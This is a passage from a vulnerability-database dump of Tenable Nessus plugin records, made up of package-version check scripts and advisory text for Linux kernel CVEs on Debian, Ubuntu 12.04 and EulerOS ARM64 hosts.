\"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux\", reference:\"3.2.73-2+deb7u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.7-ckt20-1+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-08T15:24:42", "description": "It was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the Aiptek Tablet USB device driver in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7515)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nIt was discovered that the Linux kernel did not keep accurate track of pipe buffer details when error conditions occurred, due to an incomplete fix for CVE-2015-1805. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-0774)\n\nZach Riggle discovered that the Linux kernel's list poison feature did not take into account the mmap_min_addr value. A local attacker could use this to bypass the kernel's poison-pointer protection mechanism while attempting to exploit an existing kernel vulnerability.\n(CVE-2016-0821)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's translation lookaside buffer (TLB) handling of flush events. A local attacker could use this to cause a denial of service or possibly leak sensitive information. (CVE-2016-2069)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2967-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-1805", "CVE-2015-7515", "CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8767", "CVE-2015-8812", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-0821", "CVE-2016-2069", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2967-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91087", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2967-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91087);\n script_version(\"2.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-1805\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2967-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2967-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the Aiptek Tablet USB device driver in\nthe Linux kernel did not properly sanity check the endpoints reported\nby the device. An attacker with physical access could cause a denial\nof service (system crash). (CVE-2015-7515)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nIt was discovered that the Linux kernel did not keep accurate track of\npipe buffer details when error conditions occurred, due to an\nincomplete fix for CVE-2015-1805. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode with administrative privileges. (CVE-2016-0774)\n\nZach Riggle discovered that the Linux kernel's list poison feature did\nnot take into account the mmap_min_addr value. A local attacker could\nuse this to bypass the kernel's poison-pointer protection mechanism\nwhile attempting to exploit an existing kernel vulnerability.\n(CVE-2016-0821)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's\ntranslation lookaside buffer (TLB) handling of flush events. A local\nattacker could use this to cause a denial of service or possibly leak\nsensitive information. (CVE-2016-2069)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2967-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4312\", \"CVE-2015-1805\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2967-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-generic\", pkgver:\"3.2.0-102.142\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-generic-pae\", pkgver:\"3.2.0-102.142\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-highbank\", pkgver:\"3.2.0-102.142\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-virtual\", pkgver:\"3.2.0-102.142\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-19T13:51:16", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - The acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel through 4.14.15 allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.(CVE-2018-5750i1/4%0\n\n - An issue was discovered in the btrfs filesystem code in the Linux kernel. A use-after-free is possible in try_merge_free_space() when mounting a crafted btrfs image due to a lack of chunk type flag checks in btrfs_check_chunk_valid() in the fs/btrfs/volumes.c function. This could lead to a denial of service or other unspecified impact.(CVE-2018-14611i1/4%0\n\n - A flaw was found in the way the Linux kernel visor driver handles certain invalid USB device descriptors.\n The driver assumes that the device always has at least one bulk OUT endpoint. By using a specially crafted USB device (without a bulk OUT endpoint), an unprivileged user with physical access could trigger a kernel NULL-pointer dereference and cause a system panic (denial of service).(CVE-2015-7566i1/4%0\n\n - It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network.(CVE-2016-5696i1/4%0\n\n - It was found that the Bluebooth Network Encapsulation Protocol (BNEP) implementation did not validate the type of second socket passed to the BNEPCONNADD ioctl(), which could lead to memory corruption. A local user with the CAP_NET_ADMIN capability can use this for denial of service (crash or data corruption) or possibly for privilege escalation. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we feel it is unlikely.(CVE-2017-15868i1/4%0\n\n - A vulnerability was found in the key management subsystem of the Linux kernel. An update on an uninstantiated key could cause a kernel panic, leading to denial of service (DoS).(CVE-2017-15299i1/4%0\n\n - The rfcomm_sock_bind function in net/bluetooth/rfcomm/sock.c in the Linux kernel before 4.2 allows local users to obtain sensitive information or cause a denial of service (NULL pointer dereference) via vectors involving a bind system call on a Bluetooth RFCOMM socket.(CVE-2015-8956i1/4%0\n\n - arch/mips/include/asm/thread_info.h in the Linux kernel before 3.14.8 on the MIPS platform does not configure\n _TIF_SECCOMP checks on the fast system-call path, which allows local users to bypass intended PR_SET_SECCOMP restrictions by executing a crafted application without invoking a trace or audit subsystem.(CVE-2014-4157i1/4%0\n\n - A flaw was found in the Linux kernel's ext4 filesystem code. A stack-out-of-bounds write in ext4_update_inline_data() is possible when mounting and writing to a crafted ext4 image. An attacker could use this to cause a system crash and a denial of service.(CVE-2018-10880i1/4%0\n\n - The aac_send_raw_srb function in drivers/scsi/aacraid/commctrl.c in the Linux kernel through 3.12.1 does not properly validate a certain size value, which allows local users to cause a denial of service (invalid pointer dereference) or possibly have unspecified other impact via an FSACTL_SEND_RAW_SRB ioctl call that triggers a crafted SRB command.(CVE-2013-6380i1/4%0\n\n - Linux kernel built with the KVM visualization support (CONFIG_KVM), with nested visualization(nVMX) feature enabled(nested=1), is vulnerable to an uncaught exception issue. It could occur if an L2 guest was to throw an exception which is not handled by an L1 guest.(CVE-2016-9588i1/4%0\n\n - A flaw was found in the alarm_timer_nsleep() function in kernel/time/alarmtimer.c in the Linux kernel. The ktime_add_safe() function is not used and an integer overflow can happen causing an alarm not to fire if using a large relative timeout.(CVE-2018-13053i1/4%0\n\n - net/llc/sysctl_net_llc.c in the Linux kernel before 3.19 uses an incorrect data type in a sysctl table, which allows local users to obtain potentially sensitive information from kernel memory or possibly have unspecified other impact by accessing a sysctl entry.(CVE-2015-2041i1/4%0\n\n - Incorrect error handling in the set_mempolicy() and mbind() compat syscalls in 'mm/mempolicy.c' in the Linux kernel allows local users to obtain sensitive information from uninitialized stack data by triggering failure of a certain bitmap operation.(CVE-2017-7616i1/4%0\n\n - The snd_msnd_interrupt function in sound/isa/msnd/msnd_pinnacle.c in the Linux kernel through 4.11.7 allows local users to cause a denial of service (over-boundary access) or possibly have unspecified other impact by changing the value of a message queue head pointer between two kernel reads of that value, aka a 'double fetch' vulnerability.(CVE-2017-9984i1/4%0\n\n - An integer overflow was discovered in the qla2x00_sysfs_write_optrom_ctl function in drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel through 4.12.10. This flaw allows local users to cause a denial of service (memory corruption and system crash) by leveraging root access.(CVE-2017-14051i1/4%0\n\n - A use-after-free flaw was found in the way the Linux kernel's Advanced Linux Sound Architecture (ALSA) implementation handled user controls. A local, privileged user could use this flaw to crash the system.(CVE-2014-4654i1/4%0\n\n - An information leak flaw was found in the way the Linux kernel's Virtual Dynamic Shared Object (vDSO) implementation performed address randomization. A local, unprivileged user could use this flaw to leak kernel memory addresses to user-space.(CVE-2014-9585i1/4%0\n\n - The usbhid_parse function in drivers/hid/usbhid/hid-core.c in the Linux kernel, before 4.13.8, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16533i1/4%0\n\n - A divide-by-zero vulnerability was found in the\n __tcp_select_window function in the Linux kernel. This can result in a kernel panic causing a local denial of service.(CVE-2017-14106i1/4%0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1530)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6380", "CVE-2014-4157", "CVE-2014-4654", "CVE-2014-9585", "CVE-2015-2041", "CVE-2015-7566", "CVE-2015-8956", "CVE-2016-5696", "CVE-2016-9588", "CVE-2017-14051", "CVE-2017-14106", "CVE-2017-15299", "CVE-2017-15868", "CVE-2017-16533", "CVE-2017-7616", "CVE-2017-9984", "CVE-2018-10880", "CVE-2018-13053", "CVE-2018-14611", "CVE-2018-5750"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1530.NASL", "href": "https://www.tenable.com/plugins/nessus/124983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124983);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-6380\",\n \"CVE-2014-4157\",\n \"CVE-2014-4654\",\n \"CVE-2014-9585\",\n \"CVE-2015-2041\",\n \"CVE-2015-7566\",\n \"CVE-2015-8956\",\n \"CVE-2016-5696\",\n \"CVE-2016-9588\",\n \"CVE-2017-14051\",\n \"CVE-2017-14106\",\n \"CVE-2017-15299\",\n \"CVE-2017-15868\",\n \"CVE-2017-16533\",\n \"CVE-2017-7616\",\n \"CVE-2017-9984\",\n \"CVE-2018-10880\",\n \"CVE-2018-13053\",\n \"CVE-2018-14611\",\n \"CVE-2018-5750\"\n );\n script_bugtraq_id(\n 63887,\n 68083,\n 68162,\n 71990,\n 72729\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1530)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The acpi_smbus_hc_add function in drivers/acpi/sbshc.c\n in the Linux kernel through 4.14.15 allows local users\n to obtain sensitive address information by reading\n dmesg data from an SBS HC printk call.(CVE-2018-5750i1/4%0\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. A use-after-free is possible in\n try_merge_free_space() when mounting a crafted btrfs\n image due to a lack of chunk type flag checks in\n btrfs_check_chunk_valid() in the fs/btrfs/volumes.c\n function. This could lead to a denial of service or\n other unspecified impact.(CVE-2018-14611i1/4%0\n\n - A flaw was found in the way the Linux kernel visor\n driver handles certain invalid USB device descriptors.\n The driver assumes that the device always has at least\n one bulk OUT endpoint. By using a specially crafted USB\n device (without a bulk OUT endpoint), an unprivileged\n user with physical access could trigger a kernel\n NULL-pointer dereference and cause a system panic\n (denial of service).(CVE-2015-7566i1/4%0\n\n - It was found that the RFC 5961 challenge ACK rate\n limiting as implemented in the Linux kernel's\n networking subsystem allowed an off-path attacker to\n leak certain information about a given connection by\n creating 